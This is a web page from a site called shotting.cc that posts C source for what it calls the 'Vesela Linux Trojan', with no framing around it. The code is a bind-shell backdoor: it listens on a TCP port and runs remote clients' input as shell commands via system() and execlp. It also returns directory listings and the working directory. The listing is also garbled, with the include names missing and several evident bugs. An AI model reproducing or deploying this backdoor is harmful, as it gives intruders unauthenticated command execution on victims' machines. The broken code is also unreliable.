shotting.cc

DEFCON-1

HOME

WELCOME TO SHOTTING.CC

Source Code to Vesela Linux Trojan...

#include #include #include #include #include #include #include #include #include #include #include struct commands { char cmd[1024]; int length; int start; } cmds[255]; char end[1] = "\0"; char space[1] = " "; int numberofcommands = 0; void DieWithError ( char * errormessage ) { fprintf(stderr, *errormessage, "\n"); exit(1); } /* Handler for SIGINT */ static void signal_handler ( int signo ) { if (signo = SIGINT) printf("Caught SIGINT\n"); else if (signo == SIGTERM) printf("Caught SIGTERM\n"); else { /* This should never happen. */ fprintf(stderr, "Unexpected Signal!\n"); exit ( EXIT_FAILURE ); } exit(EXIT_SUCCESS); } char * gnu_getcwd() { size_t size = 100; while (1) { char * buffer = (char *) malloc ( size ); if (getcwd( buffer, size) == buffer) { return buffer; free(buffer); } } } int getchr ( unsigned char a, unsigned char o ) { if ( (unsigned char) a == (unsigned char) o ) { return 0; } else { return 1; } } void lines( char * echoBuffer) { int rez1 = 0; int rez2 = 0; int i = 0; int cmd_counter = 0; cmds[cmd_counter].length = 0; cmds[cmd_counter].start = 0; int counter = 0; if (strlen(echoBuffer) > 0) { while ( ( unsigned char ) end[0] != (unsigned char) echoBuffer[i]) { cmds[cmd_counter].length += 1; if ( ( rez1 = getchr( (unsigned char) space[0], (unsigned char) echoBuffer[i])) == rez2) { memset(&cmds[cmd_counter].cmd,0,sizeof(cmds[cmd_counter].cmd)); strncpy(cmds[cmd_counter].cmd,echoBuffer+counter,cmds[cmd_counter].length); printf("SPACES=%d, START=%d\n", cmds[cmd_counter].length,counter); cmd_counter++; counter = i+1; } i++; } memset(&cmds[cmd_counter].cmd,0,sizeof(cmds[cmd_counter].cmd)); strncpy(cmds[cmd_counter].cmd,echoBuffer+counter,cmds[cmd_counter].length - 1); printf("SPACE=%d, FIN=%d\n", cmds[cmd_counter].length, counter); cmd_counter++; } numberofcommands = cmd_counter; while (cmd_counter > 0) { cmd_counter--; printf("%s\n", cmds[cmd_counter].cmd); cmds[cmd_counter].start = 0; cmds[cmd_counter].length =0; } } int get_command(unsigned char *c, unsigned char * echoBuffer) { int result1 = 0; int result2 = 0; int i = 0; while( ( unsigned char ) end[0] != ( unsigned char ) echoBuffer[i] ) { if ( ( result1 = getchr( ( unsigned char ) c[i], ( unsigned char ) echoBuffer[i] ) ) == result2 ) { i++; } else { printf("BREAK£\n"); break; } } if ( result1 == result2 ) { return 0; } else { return 1; } } void HandleTCPClient ( int cIntSocket ) { int recvMsgSize; char echoBuffer[1024]; char currentDirectory[1024] = "pwd\n\0"; char listDirectory[1024] = "ls\n\0"; char time_command[1024] = "time\n"; char * dir; char * dd; struct dirent * dirp; char * pattern; char * string; char * command; memset(&echoBuffer, 0, sizeof(echoBuffer)); if ( ( recvMsgSize = recv(cIntSocket, echoBuffer, 64, 0 ) ) < 0 ) { DieWithError("recv() Failed."); } while ( recvMsgSize > 0 ) { if (send(cIntSocket, echoBuffer, sizeof(echoBuffer), 0) != sizeof(echoBuffer) ) { DieWithError("send() failed."); } memset( &echoBuffer, 0, sizeof(echoBuffer) ); if ( ( recvMsgSize = recv(cIntSocket, echoBuffer, 64, 0 ) ) < 0 ) { DieWithError("recv() failed."); } lines(echoBuffer); char a[6] = "help\n\0"; int result = get_command(a, echoBuffer); if ( result == 0 ) { char *help = "! is used for shell command execution. \n pwd is used to print the current working directory. \n ls is used to list directory contents. \n \n\n\0"; strcpy(echoBuffer, help); } char c[5] = "pwd\n\0"; result = get_command( c , echoBuffer ); if ( result == 0 ) { dir = gnu_getcwd(); strcpy(echoBuffer, dir); strcat(echoBuffer, "\n"); memset(&dir, 0, sizeof(dir)); } char d[8] = "Xander\n\0"; result = get_command(d, echoBuffer); if ( result == 0 ) { strcpy(echoBuffer, "Is Cool!£"); strcat(echoBuffer, "\n"); } char e[3] = "# "; result = get_command(e, cmds[0].cmd); printf("%s, %s\n", &cmds[0].cmd, &cmds[1].cmd); if ( result == 0 ) { int ret; ret = execlp(cmds[1].cmd, cmds[1].cmd,NULL); if ( ret == -1 ) { perror("execlp"); printf("execlp"); } } char f[6] = "! "; result = get_command(f, cmds[0].cmd); if ( result == 0 ) { char * commands; memset(&commands, 0, sizeof(commands)); int i = 1; while ( i < numberofcommands ) { strcat(&commands, &cmds[i].cmd); i++; } printf("%s\n", &commands); system(&commands); } char g[3] = "ls "; result = get_command(g, cmds[0].cmd); if ( result == 0 ) { dd = opendir(cmds[1].cmd); memset(&dir, 0, sizeof(dir)); if ( dd == NULL ) { strcpy(echoBuffer, "Cannot open directory\n"); } else { while ( (dirp = readdir(dd) ) != NULL ) { strcpy(echoBuffer, dirp->d_name); strcat(echoBuffer, "\n"); if ( send( cIntSocket, echoBuffer, sizeof(echoBuffer), 0) != sizeof(echoBuffer) ) { DieWithError( "Send() Failed." ); } memset( &echoBuffer, 0, sizeof(echoBuffer) ); } closedir(dd); } } } strcpy(echoBuffer, "EXITING..."); if ( send( cIntSocket, echoBuffer, sizeof(echoBuffer), 0) != sizeof(echoBuffer)) { DieWithError( "Send Failed"); } close(cIntSocket); } int main ( int argc, char * argv[] ) { int servSock; int clntSock; struct sockaddr_in echoServAddr; struct sockaddr_in echoClntAddr; unsigned short echoServPort; unsigned int cIntLen; if ( argc != 2 ) { fprintf(stderr, "Usage: %s \n", argv[0]); exit(EXIT_FAILURE); } printf ("Current Working Directory: %s\n", gnu_getcwd()); if ( signal ( SIGINT, signal_handler) == SIG_ERR) { fprintf(stderr, "Cannot handle SIGINT!\n"); exit(EXIT_FAILURE); } if ( signal ( SIGPROF, SIG_DFL) == SIG_ERR) { fprintf(stderr, "Cannot RESET SIGPROF!\n"); exit(EXIT_FAILURE); } if ( signal(SIGHUP, SIG_IGN) == SIG_ERR) { fprintf(stderr, "Cannot ignore SIGHUP!\n"); exit(EXIT_FAILURE); } echoServPort = atoi(argv[1]); if ((servSock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0 ) { DieWithError("socket Failed."); } int port = atoi(argv[1]); memset(&echoServAddr, 0, sizeof(echoServAddr)); echoServAddr.sin_family = AF_INET; echoServAddr.sin_addr.s_addr = htonl(INADDR_ANY); echoServAddr.sin_port = htons(port); if (( servSock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { DieWithError("socket() Failed."); } if ( bind( servSock, (struct sockaddr *) &echoServAddr, sizeof(echoServAddr)) < 0) { DieWithError( "Bind() Failed."); } if (listen(servSock, 5) < 0) { DieWithError( "Listen Failed."); } int fork_return; fork_return = fork(); if (fork_return < 0 ) { printf("Unable to create child process, exiting...\n"); exit(0); } if (fork_return > 0 ) { printf("Created Child Process %d\n", fork_return); while(1) { // sleep(100000); cIntLen = sizeof(echoClntAddr); if (( clntSock = accept( servSock, (struct sockaddr *) &echoClntAddr, &cIntLen)) < 0) { DieWithError( "accept () Failed. "); } printf("Handling client %s\n", inet_ntoa(echoClntAddr.sin_addr)); HandleTCPClient(clntSock); } } return 0; }